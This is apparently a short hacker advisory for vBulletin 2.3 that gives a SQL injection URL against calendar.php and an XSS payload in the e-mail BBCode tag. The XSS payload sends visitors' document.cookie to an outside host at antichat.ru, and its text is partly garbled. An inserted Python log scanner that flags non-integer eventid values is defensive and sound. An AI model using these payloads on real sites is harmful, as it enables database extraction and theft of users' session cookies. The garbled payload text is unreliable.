# Title: vBulletin Vulnerability versions 2.3.* - SQL injection.
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 2.3
===========================================================
www.sec-war.com
===========================================================
Vulnerable versions 2.3.*: SQL injection caused by insufficient validation of input data in 'calendar.php', which lets a request send SQL to the server.
For example:
www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid,'0000-0-0 ', version (), userid FROM calendar_events WHERE eventid =14) order by eventdate
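A defender-side check for the calendar.php issue above, as an added example that is not part of the original advisory: it scans web access-log lines for calendar.php requests whose eventid is not a plain integer. The log lines, the combined log format and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges);
# they are sample data, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2010:12:00:01 +0000] '
    '"GET /forum/calendar.php?s=&action=edit&eventid=14 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [10/Feb/2010:12:00:09 +0000] '
    '"GET /forum/calendar.php?s=&action=edit'
    '&eventid=14%20union%20(SELECT%20version()) HTTP/1.1" 200 5301',
    '203.0.113.7 - - [10/Feb/2010:12:00:15 +0000] '
    '"GET /forum/showthread.php?eventid=abc HTTP/1.1" 200 812',
]

# Request target inside the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# An event id is expected to be a short decimal integer and nothing else.
INTEGER_RE = re.compile(r"\d{1,10}")


def flag_eventid(line):
    """Return the decoded eventid if a calendar.php request carries a
    non-integer value, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/calendar.php"):
        return None
    # parse_qs percent-decodes values, so encoded spaces and quotes are seen.
    for value in parse_qs(url.query).get("eventid", []):
        if not INTEGER_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, eventid) pairs for every flagged line."""
    hits = []
    for line in lines:
        value = flag_eventid(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer eventid: {value!r}")
```

The same rule is the fix on the application side: treat eventid as an integer and reject anything else before it reaches a query.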
Vulnerable versions 2.*.*: XSS by injecting script through the e-mail tag.
[E * MAIL] aaa@aaa.aa » 's ='[/ E * MAIL]'sss =» i = new Image (); i.src ='https://www.exploit-db.com/exploits/11396/ http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval(this.sss));
===========================================================
ROOT_EGY to connect: r0t@hotmail.es
===========================================================
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
===========================================================